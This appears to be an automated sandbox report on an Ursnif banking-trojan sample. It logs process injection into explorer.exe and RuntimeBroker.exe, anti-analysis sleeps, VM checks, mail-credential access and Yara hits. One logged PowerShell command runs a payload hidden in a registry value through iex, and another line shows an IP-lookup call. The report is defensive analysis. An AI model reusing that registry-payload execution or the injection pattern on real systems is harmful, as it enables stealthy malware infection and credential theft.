Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll32.exe TID: 1928	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_02813DEE
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,	29_2_03B537B8

Source: C:\Windows\System32\loaddll32.exe

0_2_02831C05

Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWta@
Source: explorer.exe, 0000001D.00000002.510389270.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000022.00000000.381725023.00000209AA054000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ro
Source: RuntimeBroker.exe, 0000001E.00000002.502607877.000002413A440000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.392680390.000000000DC40000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001D.00000000.364327459.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.388411193.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 0000001D.00000000.387740964.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281DB26 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,

0_2_0281DB26

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0282DA66 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

0_2_0282DA66

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: C:\Windows\System32\control.exe base: 290000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 3090000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: E9E000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 2AB0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: E9C000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 3090000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\System32\loaddll32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\loaddll32.exe	Thread register set: target process: 6996	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5244
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5436
Source: C:\Windows\explorer.exe	Thread register set: target process: 984

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 290000	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7BEF712E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: E9E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AB0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: E9C000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 3090000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8F7000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2413CAD0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8DFD4F1000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E766730000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 376E38B000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 209AB9B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 42F449C000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 165793D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D1A98EB000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EEFEFF0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP'
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 0000001D.00000002.501859313.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 0000001D.00000000.364575168.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000000.371130415.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502253927.000001E765260000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.503473567.00000209AA590000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02824270 cpuid

0_2_02824270

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

0_2_73CA19DA

Queries the installation date of Windows

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0281190E CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

0_2_0281190E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73CA13E4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_73CA13E4

Source: C:\Windows\System32\loaddll32.exe

0_2_0281B868

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_73CA1371 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_73CA1371

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
